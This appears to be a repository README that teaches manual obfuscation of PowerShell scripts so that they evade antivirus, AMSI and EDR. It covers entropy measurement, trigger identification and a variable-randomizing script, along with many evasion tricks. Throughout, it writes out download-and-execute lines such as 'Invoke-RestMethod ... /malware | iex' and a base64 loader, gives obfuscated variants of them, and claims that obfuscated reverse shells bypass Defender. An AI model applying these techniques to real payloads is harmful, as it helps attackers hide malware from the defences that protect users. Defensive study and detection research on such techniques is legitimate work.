A collection of techniques, examples and a little bit of theory for manually obfuscating PowerShell scripts to achieve AV evasion, compiled for educational purposes. The contents of this repository are the result of personal research, including reading materials online and conducting trial-and-error attempts in labs and pentests. You should not take anything for granted.
YouTube video presentation: youtube.com/watch?v=tGFdmAh_lXE
- Entropy
- Identify Detection Triggers
- Rename Objects
- Obfuscate Boolean Values
- Cmdlet Quote Interruption
- Get-Command Technique
- Substitute Loops
- Substitute Commands
- Mess With Strings
- Append Junk
- Add or Remove Comments
- Randomize Char Cases
- Rearrange Script Components
The scientific term entropy
, which is generally defined as the measure of randomness or disorder of a system is important in AV evasion. This is because, malware often contains code that is highly randomized, encrypted and/or encoded (obfuscated) to make it difficult to analyze and therefore detect. As one of various methods, Anti-virus products use entropy analysis to identify potentially malicious files and payloads
It is important to understand this concept because, when obfuscating code, you should keep in mind the entropy variance created by the changes you choose to make. Breaking signatures is easy, but if you don't pay attention to the entropy level, sophisticated AV/EDRs will see through it.
A principle to keep in mind: The greater the entropy, the more likely the data is obfuscated or encrypted, and the more probable the file/payload is malicious. Fortunately, there are ways to lower it.
Claude E. Shannon
introduced a formula in his 1948 paper A Mathematical Theory of Communication
which can be used to measure the entropy in a set of data. Here's a simple Python implementation of the Shannon Entropy
you can use to measure the entropy of the payloads you develop:
#!/bin/python3
# Usage: python3 entropy.py <file>
import math, sys
def entropy(string):
"Calculates the Shannon entropy of a UTF-8 encoded string"
# decode the string as UTF-8
unicode_string = string.decode('utf-8')
# get probability of chars in string
prob = [ float(unicode_string.count(c)) / len(unicode_string) for c in dict.fromkeys(list(unicode_string)) ]
# calculate the entropy
entropy = - sum([ p * math.log(p) / math.log(2.0) for p in prob ])
return entropy
f = open(sys.argv[1], 'rb')
content = f.read()
f.close()
print(entropy(content))
You can also use this online Shannon Entropy calculator or Microsoft's Sigcheck.exe with the -a
option.
The mature and elegant thing to do before jumping into trial and error obfuscation tests to come up with a payload variation that is not flagged, is to identify the part(s) in a script that trigger malware detection. Especially in short scripts like C2 commands, you might be able to make insignificant changes and fly off the radar on the spot.
A great tool to identify such triggers is AMSItrigger. Here's a usage example with a file containing a malicious script. The red area signifies the part that obfuscation should be applied:
You could also identify triggers manually by executing a script chunk by chunk.
When obfuscating scripts, it should be a priority to replace variable/class/function names with random ones. That way, in combination with other techniques, you will be able to bypass detection easily. But you should keep in mind the entropy of the payloads you develop. Take in consideration the following standard reverse shell script that is generally detected by most if not all AVs:
Now consider the following obfuscated version:
In this version, all variable names have been substituted with 32 chars long random names. I also replaced (pwd).Path
with $(gl)
. The payload has a Shannon entropy
of 4.96
. At the time of writing this, it is not detected by MS Defender and a banch of other products:
Now consider this version:
This variation also has all variable names replaced but this time with names consisting of x number of 'f' characters, which results in a significant drop of the payloads entropy. I replaced (pwd).Path
with $(gl)
here as well. Again, at the time of writing, it is not detected by MS Defender. The payload has a Shannon entropy
of 0.76
.
⚡ Both of these variations bypass common AVs, but the second one has a lower entropy and will probably have a better chance when processed by EDRs and other sophisticated anti-malware engines.
You can use the script below to randomize the names of variables in a PowerShell script.
#!/bin/python3
#
# This script is an example. It is not perfect and you should use it with caution.
# Source: https://github.com/t3l3machus/PowerShell-Obfuscation-Bible
# Usage: python3 randomize-variables.py <path/to/powershell/script>
import re
from sys import argv
from uuid import uuid4
def get_file_content(path):
f = open(path, 'r')
content = f.read()
f.close()
return content
def main():
payload = get_file_content(argv[1])
used_var_names = []
# Identify variables definitions in script
variable_definitions = re.findall('\$[a-zA-Z0-9_]*[\ ]{0,}=', payload)
variable_definitions.sort(key=len)
variable_definitions.reverse()
# Replace variable names
for var in variable_definitions:
var = var.strip("\n \r\t=")
while True:
new_var_name = uuid4().hex
if (new_var_name in used_var_names) or (re.search(new_var_name, payload)):
continue
else:
used_var_names.append(new_var_name)
break
payload = payload.replace(var, f'${new_var_name}')
print(payload + '\n')
main()
It's super fun and easy to replace $True
and $False
values with other boolean equivalents, which are literaly unlimited. Especially if you have identified the detection trigger in a given payload and that includes a $True
or $False
value, you will probably be able to bypass detection by simply replacing it with a boolean substitute. All of the examples below evaluate to True
. You can reverse them to False
by simply adding an exclamation mark before the expression (e.g., ![bool]0x01
):
- Boolean typecast of literally anything that is not
0
orNull
or anempty string
, will returnTrue
:
[bool]1254
[bool]0x12AE
[bool][convert]::ToInt32("111011", 2) # Converts a string to int from base 2 (binary)
![bool]$null
![bool]$False
[bool]"Any non empty string"
[bool](-12354893) # Boolean typecast of a negative number
[bool](12 + (3 * 6))
[bool](Get-ChildItem -Path Env: | Where-Object {$_.Name -eq "username"})
[bool]@(0x01BE)
[bool][System.Collections.ArrayList]
[bool][System.Collections.CaseInsensitiveComparer]
[bool][System.Collections.Hashtable]
# Well, you get the point.
- Boolean typecast of any class will return
True
as well:
[bool][bool]
[bool][char]
[bool][int]
[bool][string]
[bool][double]
[bool][short]
[bool][decimal]
[bool][byte]
[bool][timespan]
[bool][datetime]
- The result of a comparison that evaluates to
True
(duh):
(9999 -eq 9999)
([math]::Round([math]::PI) -eq (4583 - 4580))
[Math]::E -ne [Math]::PI
- Or you can just grab a
True
value from an object's attributes:
$x = [System.Data.AcceptRejectRule].Assembly.GlobalAssemblyCache
$x = [System.TimeZoneInfo+AdjustmentRule].IsAnsiClass
$x = [mailaddress].IsAutoLayout
$x = [ValidateCount].IsVisible
- You can mix all these stuff and weird things up by composing hideous ways to state
True
orFalse
:
[bool](![bool]$null)
[System.Collections.CaseInsensitiveComparer] -ne [bool][datetime]'2023-01-01'
[bool]$(Get-LocalGroupMember Administrators)
!!!![bool][bool][bool][bool][bool][bool]
You can obfuscate cmdlets by adding single and/or double quotes in between their characters, as long as it's not at the beginning. It's super effective! For example, the expresion iex "pwd"
can be substituted with:
i''ex "pwd"
i''e''x "pwd"
i''e''x'' "pwd"
ie''x'' "pwd"
iex'' "pwd"
i""e''x"" "pwd"
ie""x'' "pwd"
# and so on... but also:
i''ex "p''wd"
i''e''x "p''w''d"
i''e''x'' "p''w''d''"
ie''x'' "pw''d`"`""
iex'' "p`"`"w`"`"d`"`""
i""e''x"" "p`"`"w`"`"d''"
ie""x'' "p`"`"w''d`"`""
# You get the point.
A really cool trick my friend and mighty haxor Karol Musolff (@kmusolff) showed me. You can use Get-Command
(or gcm
) to retrieve the name (string) of any command, including all of the non-PowerShell files in the Path environment variable ($env:Path
) by using wildcards. You can then run them as jobs with the &
operator. For example, the following line:
Invoke-RestMethod -uri https://192.168.0.66/malware | iex
Could be obfuscated to:
&(Get-Command i????e-rest*) -uri https://192.168.0.66/malware | &(gcm i*x)
Or even better, this one, that has a lower Shannon entropy
value:
&(Get-Command i************************************************************e-rest*) -uri https://192.168.0.66/malware | &(gcm i*x)
There are certain loops that can be substituted with other loop types or functions. For example, a While ($True){ # some code }
loop can be substituted with the following:
An infinite For loop
For (;;) { # some code }
A Do-While loop
Do { # some code } While ($true)
A Do-Until loop
Do { # some code } Until (1 -eq 2)
A recursive function
function runToInfinity {
# do something;
runToInfinity;
}
You can try adding parameters to a cmdlet. For example, the following line:
iex "whoami"
Could be expanded to:
iex -Debug -Verbose -ErrorVariable $e -InformationAction Ignore -WarningAction Inquire "whoami"
You may of course try the opposite.
You can "pollute" a script with random variables and functions. Assume the following script as malicious:
$b64 = $(irm -uri http://192.168.0.66/malware);
$virus = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($b64));
iex $virus;
You might be able to break its signature by doing something like:
$b64 = $(irm -uri http://192.168.0.66/malware); sleep 0.01;sleep 0.01;Get-Process | Out-Null;
$virus = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($b64));sleep 0.01;sleep 0.01;Measure-Object | Out-Null;
iex $virus;
You can always look for commands or even whole code blocks in a script that you can substitute with components that have the same/similar functionality. In the following classic reverse shell script, the pwd
command is used to retrieve the current working directory and reconstruct the shell's prompt value:
The (pwd).Path
part can be replaced by the following weird, unorthodox little script and although it even includes pwd
it does serve our purpose of breaking the signature while maintaining the functionality of the script:
"$($p = (Split-Path `"$(pwd)\\0x00\`");if ($p.trim() -eq ''){echo 'C:\'}else{echo $p})"
There are of course simpler substitutes for pwd
like gl
, get-location
and cmd.exe /c chdir
that could do the trick, especially in combination with other techniques.
There's no end to what one can do with strings. Find below some interesting concepts. Examples use the string 'malware'
:
Pretty straightforward and classic:
'mal' + 'w' + 'ar' + 'e'
Add the desired value between an irrelevant string and use substring()
to extract it based on start - end indexes:
'xxxmalwarexxx'.Substring(3,7)
Create a junk string and replace it with the desired value via regex matching:
'a123' -replace '[a-zA-Z]{1}[\d]{1,3}','malware'
Encode your string and decode it within the script:
[System.Text.Encoding]::Default.GetString([System.Convert]::FromBase64String("bWFsd2FyZQ=="))
"$([char]([byte]0x6d)+[char]([byte]0x61)+[char]([byte]0x6c)+[char]([byte]0x77)+[char]([byte]0x61)+[char]([byte]0x72)+[char]([byte]0x65))"
That's only to get you started. To be continued...
Obfuscating a script by appending comments here and there might actually do the trick on its own.
for example, a reverse shell command could be obfuscated like this:
Modified (appended <# Suspendisse imperdiet lacus eu tellus pellentesque suscipit #>
in various places)
This will not only work, but also lower the payload's Shannon entropy
value (given that you don't use complex random comments).
There are malware-ish strings that will trigger AMSI immediately and it should be a priority to replace them, when obfuscating scripts. Check this out:
Just by typing the string 'invoke-mimikatz' in the terminal AMSI is having a stroke (the script is not even present / loaded).
These strings may be found in comments as well, so it's a good idea to remove them, especially from FOS resources you grab from the internet (e.g. Invoke-Mimikatz.ps1
from GitHub).
*It's generally a good idea to remove comments. This was just an example.
Probably the oldest trick in the book. Randomazing the character case of cmdlets and parameters might help:
inVOkE-eXpReSSioN -vErbOse "WHoAmI /aLL" -dEBug
Sometimes simply moving variables and classes to different locations might work, especially if you have found the detection trigger and it includes some variable definition that could be taking place somewhere else, like the beginning of the script.